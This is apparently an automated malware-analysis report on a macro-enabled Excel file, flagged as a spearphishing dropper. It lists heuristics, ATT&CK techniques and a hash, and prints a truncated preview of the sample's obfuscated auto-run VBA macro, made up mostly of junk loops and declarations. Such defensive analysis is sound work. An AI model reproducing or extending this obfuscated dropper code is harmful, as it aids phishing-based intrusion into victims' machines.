Verdict: MALICIOUS
Risk Score: 202

Malware Insights
MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
The critical heuristic firing for a Shell() call within a Workbook_Open macro indicates that the VBA code is designed to execute external commands. The presence of obfuscated VBA code and the 'CreateObject' call further suggest that the macro is attempting to download and run a secondary payload. Given these indicators, the most likely attack pattern is a macro-enabled document used for initial access via spearphishing.

Heuristics (6)
- VBA macros detected (medium; 4 related findings) [OLE_VBA_MACROS]: Document contains VBA macro code.
- Shell() call in VBA (critical) [OLE_VBA_SHELL]: Shell() call in VBA.
- Workbook_Open macro (high) [OLE_VBA_WBOPEN]: Workbook_Open macro.
- CreateObject call (high) [OLE_VBA_CREATEOBJ]: CreateObject call.
- VBA p-code auto-exec with execution tokens (high) [OLE_VBA_PCODE_AUTOEXEC_EXEC]: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Suspicious extracted artifact (info) [EXTRACTED_FILE_STATIC_TRIAGE]: One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 15816 bytes |

SHA-256: 4f24d654f572fbb8965b66e3ca338d6405809cafe5157a51dec54901f858d58b
Detection
- ClamAV: No threats found
- Obfuscation or payload: likely (carved artifact contains 4 long base64-like blob(s))

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub workbook_open()
LuzU2qsyZSog.TixfRPoPwjeqNFjdIAsy
While 8 = 9813
Dim dKDMoF24m6UqiUWOlwVPWw_E9xGSrDnb3byH As Variant
Wend
Dim dizJXtmzMwG2r As Integer
While 16 = 7747
Dim T2VnbaqK8Mz9hJiQ3wEeNtB6J1mHH2JoOkWJQwYAG7fU9Kz As Variant
Wend
Dim hDhT_BUcizYbj As Integer
While 26 = 8870
Dim wgB_CJr6wW9_VDWQLp69AD_jgJm3GxT1 As Variant
Wend
Dim TxMj5aQxb3uohNl As Integer
While 19 = 433
Dim JUIcbiraZg2fyx9BFtgzvUuWFfGRXBRgo56aJW1NdG As Variant
Wend
Dim c3YQmDumZc_F As Integer
While 5 = 4680
Dim JyiuU6ZYBXNSz32f1s3QUm127y3DgujxbhsF1XB4x_E_mEZsJMuq As Variant
Wend
Dim ivuf7qxeCV1OwYz As Integer
While 28 = 8403
Dim QIuoap9cOgvM1XI2R_3NpwKIIje1ZLyQMNGhYhR_jQd8Ib6F3dhO As Variant
Wend
Dim JId7kd1JFBCr As Integer
While 19 = 2926
Dim c_kOjatp2mWQL9pmW86niWB_mkwCayb As Variant
Wend
Dim OaOpbS1RBwhAf As Integer
While 21 = 2536
Dim uKslwLvH_WGE7fl8mpMCJGz7QMRfo4z_V As Variant
Wend
Dim eRZ1JNNBRIC As Integer
While 11 = 6920
Dim FjewMSWFT7UmUvSi3NcIgGraMJFbZ9A17vyqreQUfsnXHoD_1oTvy_e9 As Variant
Wend
Dim ChCK4oT6coi7k1 As Integer
While 4 = 535
Dim W7GlwbRQhFAkunMB7Oyzn7NHlCSbo9dGNw7ypVqeg As Variant
Wend
Dim u_5JR3pqar As Integer
While 13 = 5207
Dim RFuLZq9_sHzlil3V8qXTjhSQ26S8RIluLPJAbieGqU7VqGZRP658 As Variant
Wend
Dim QEFtvcScWApie As Integer
While 4 = 4556
Dim DXQZ23WJPmMj7jse_pVMmbEHZM8OBs As Variant
Wend
Dim onWzlsG2WBfw_ As Integer
End Sub
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "LuzU2qsyZSog"
Dim jQU69aoE7LjNAiDwWrXQ68v2AAyoGUFCkIeMdvAFYW2HAn3d9hp4Ilalec47k_8jEglzDyQkpP1h_ As String
Function b3Hy3i7VSST1jRG_n4GHf7hLE7_WGQSpzbmOPW_o_VUTB9AZ9(f58sj8iJgBw_25_W_QOSXKReALZ4DYKWc4KcY_vIDDUl9MhXqq33gDbTlbrVgnFGyXf8rj75dENSypewmBKVeRyXZ116VXkX7LvjqjoFs7WZxHd575sdatkfhFf1rAhEdyUl35_CV_lh5X)
While 28 = 1548
Dim UpMs6YzhSM9ndmyTQhwv_RUCv6Efk1iMxtxi9o__eHFn3Tib_RL1 As Variant
Wend
Dim gf9CTJ7_SS7b As Integer
While 3 = 868
Dim nuzsxNUlhvPzKpHZVmaRnroPtuNwq_pKKm_Gdymy6jQuOHzmA As Variant
Wend
Dim elo2mx5Eh9C9g As Integer
While 13 = 1112
Dim g_DngoA6f9kUDY4Ak4jvJVARgyDB5zjyW As Variant
Wend
Dim otoJcR8_iEo As Integer
Dim d_yLFNlTK8rqNMB7EUZGeOwc4YW_bPV6maF69wcpQQ3P1AFWtr9ADMZMQTRpzl25kuDwFE7Q1tzMUfl2Q_NsPT1X_2nmdvzoX8n_7ROntqHSVL1urYXyVGmO3nwNaSv_4JxW
While 6 = 2765
Dim PPteKgVGXurIDuErk9_pXu8WoMyGklukPTBO_hyWba As Variant
Wend
Dim Zl7ijYViUAhXPdR As Integer
While 19 = 7341
Dim Uy7qNfv_F3srzmBHlM6TTZEmYtAOsB As Variant
Wend
Dim Cg6rr2pL4nlzozq As Integer
While 3 = 8409
Dim f6S26JSI75sSQdeeODAoI34SO5_BorjYvqMD61_psV9 As Variant
Wend
Dim v8hXrXGUunIf As Integer
Dim cJTFo9tZAa2aLS2YEzG313NYcisJqny_uF6VCHUCDmv_wHVtb_XkBxAj54lEOirVkwpEWeV7
While 9 = 1289
Dim lA_k_IQcMTSfiOZiX8S6w4FTqfPlgVxtk As Variant
Wend
Dim JjC5N_eZ3tan As Integer
While 12 = 6821
Dim Axb7h7vSMsr3o4b3n61eh5WnWmH3wd3 As Variant
Wend
Dim Iooorxn9XAYWa2H As Integer
While 11 = 9127
Dim OSklv626_EZwi4w3frygM9NtD_7
... (truncated)